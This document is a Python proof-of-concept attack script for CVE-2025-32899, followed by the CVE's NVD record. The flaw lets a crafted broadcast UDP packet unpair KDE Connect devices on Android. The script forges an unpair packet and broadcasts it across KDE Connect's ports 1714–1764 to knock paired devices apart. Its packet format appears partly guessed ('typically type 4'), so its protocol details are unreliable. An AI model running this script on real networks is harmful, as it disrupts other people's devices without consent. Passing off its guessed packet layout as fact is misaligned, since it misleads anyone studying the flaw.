CVE-2025-32899

#!/usr/bin/env python3 # CVE-2025-32899 PoC - KDE Connect Discovery Packet Spoofing # Description: Crafted UDP broadcast packet causes device unpairing import socket import struct import json import sys def craft_malicious_discovery_packet(): """ Craft a malicious KDE Connect discovery packet that triggers unpairing This PoC demonstrates the vulnerability in KDE Connect < 1.33.0 """ # KDE Connect discovery packet format # The packet type that triggers unpairing is typically type 4 (unpair request) packet_type = 4 # Unpair packet type # Build the packet header header = b'\x00\x01' # Protocol version header += struct.pack('>H', packet_type) # Packet type # Device identity (can be arbitrary for this attack) device_id = b'ATTACKER_DEVICE_ID' device_name = b'Malicious Device' # Build the payload payload = { 'type': 'unpair', 'deviceId': device_id.decode(), 'deviceName': device_name.decode() } payload_json = json.dumps(payload).encode('utf-8') # Combine header and payload packet = header + payload_json return packet def send_broadcast_packet(packet, target_ip='255.255.255.255', port=1714): """ Send the malicious packet via UDP broadcast """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) sock.sendto(packet, (target_ip, port)) print(f"[+] Malicious discovery packet sent to {target_ip}:{port}") print(f"[+] Packet size: {len(packet)} bytes") return True except Exception as e: print(f"[-] Error sending packet: {e}") return False finally: sock.close() def main(): print("=" * 60) print("CVE-2025-32899 - KDE Connect Unpairing PoC") print("=" * 60) # Craft the malicious packet packet = craft_malicious_discovery_packet() # Send to default KDE Connect discovery port # Port range: 1714-1764 (TCP/UDP) for port in range(1714, 1765): send_broadcast_packet(packet, port=port) print("\n[!] Attack completed. Target devices should have been unpaired.") print("[!] Note: This PoC is for educational and testing purposes only.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-32899", "sourceIdentifier": "[email protected]", "published": "2025-12-05T05:16:59.407", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In KDE Connect before 1.33.0 on Android, a packet can be crafted that causes two paired devices to unpair. Specifically, it is an invalid discovery packet sent over broadcast UDP."}, {"lang": "es", "value": "En KDE Connect antes de 1.33.0 en Android, se puede manipular un paquete que causa que dos dispositivos emparejados se desemparejen. Específicamente, es un paquete de descubrimiento inválido enviado a través de UDP de difusión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1250"}]}], "references": [{"url": "https://kde.org/info/security/advisory-20250418-1.txt", "source": "[email protected]"}, {"url": "https://kdeconnect.kde.org", "source": "[email protected]"}]}}